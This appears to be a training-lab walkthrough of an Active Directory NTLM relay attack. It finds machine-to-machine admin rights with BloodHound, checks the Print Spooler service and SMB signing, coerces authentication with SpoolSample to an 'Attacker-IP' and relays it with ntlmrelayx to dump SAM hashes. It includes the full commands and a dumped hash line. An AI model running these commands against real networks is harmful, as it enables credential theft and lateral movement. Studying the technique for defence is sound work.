Automated Relays
Bloodhound
All Windows hosts have a Machine Account. This is the User Account associated with the Machine. Unless someone tampered with the Account of the Host, the Passwords of these Accounts are Uncrackable.
In AD, these Machine Accounts are used in different Services. Different Domain Controllers use their Machine Accounts to Synchronize AD Updates and changes. When you request a Certificate on behalf of the Host you are working on, the Machine Account of that Host is used for Authentication to the AD Certificate Service.
There is an exceptional case in AD, where one Machine has Administrator rights over another Machine. Essentially in the AD Configuration, Administrative Permissions over a Host have been granted to another Host.
Bloodhound
We are on ADOBE-SERVER-1 with Tier 1 Admin Privileges.
Bloodhound
shows us that the ADOBE-SERVER-2 machine account has Administrative Privileges over the ADOBE-SERVER-1 Machine.
We need to Identify cases where a Machine Account has Administrative Access over another Machine, we can use Bloodhound
to accomplish this Task.
:: This Query will attempt to find Instances where a Computer has the [AdminTo] Relationship over another Computer
MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p
The Printer Bug
Administrators
The Printer Bug is a "Feature"
of the MS-RPRN Protocol (PrintSystem Remote Protocol), which allows a Domain User to Remotely force a Target Host running the Print Spooler Service to Authenticate to an arbitrary IP Address.
- To Exploit it apart from Administrative Privileges we need to meet the Following Conditions:
- Valid set of AD Account Credentials
- Network Connectivity to the target's SMB Service
- The Target Host must be running the Print Spooler service
- The Hosts must Not have SMB Signing Enforced
Print Spooler Service
We need to Determine if the Print Spooler Service
is Running. Since we don't have access to ADOBE-SERVER-2, we need to Query from the Network Perspective.
In this case, we can use a WMI Query from our Session to Query the Service current State. The Commands Below can be used to verify that the Service is Running.
- Commands
- Output
GWMI Win32_Printer -Computer ADOBE-SERVER-2.za.adobe.loc
Get-PrinterPort -ComputerName ADOBE-SERVER-2.za.adobe.loc
Location :
Name : Microsoft XPS Document Writer
PrinterState : 0
PrinterStatus : 3
ShareName :
SystemName : ADOBE-SERVER-2
Location :
Name : Microsoft Print to PDF
PrinterState : 0
PrinterStatus : 3
ShareName :
SystemName : ADOBE-SERVER-2
SMB Signing
In order to Relay the Coerced Authentication
attempt, SMB Signing
should not be Enforced.
- NMAP
- Output
nmap --script=smb2-security-mode -p445 ADOBE-SERVER-1.za.adobe.loc ADOBE-SERVER-2.za.adobe.loc
Nmap scan report for ADOBE-SERVER-1
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing Enabled but not Required
Nmap scan report for ADOBE-SERVER-2
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing Enabled but not Required
Exploiting Authentication Relays
Abusing the Print Spooler Service
may cause it to Crash, and a Callback is not always Guaranteed.
SpoolSample
can be used to Exploit Authentication Relays. The Exploit should be Compiled and Transferred to the Target Machine.
We will use SpoolSample to coerce ADOBE-SERVER-2 to Authenticate to us on the Target Windows Machine and then use NTLMRelayx
to Relay the Authentication attempt to ADOBE-SERVER-1.
When ADOBE-SERVER-2 makes the Authentication attempt on ADOBE-SERVER-1 we will Receive a HASH
Dump if no Command was Specified.
- Attacker Machine
- Windows Machine
- Output
:: Commands can be specified with [-c]
ntlmrelayx -smb2support -t smb://ADOBE-SERVER-1 -debug
:: Connect to the Attacker
SpoolSample ADOBE-SERVER-2.za.adobe.loc "Attacker-IP"
Output from NTLMRelayx
on the Attacker Machine. The Hashes can be used to attempt to Authenticate Remotely using Tools such as Evil-WinRM - PsExec etc..
[...]
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c:::
[...]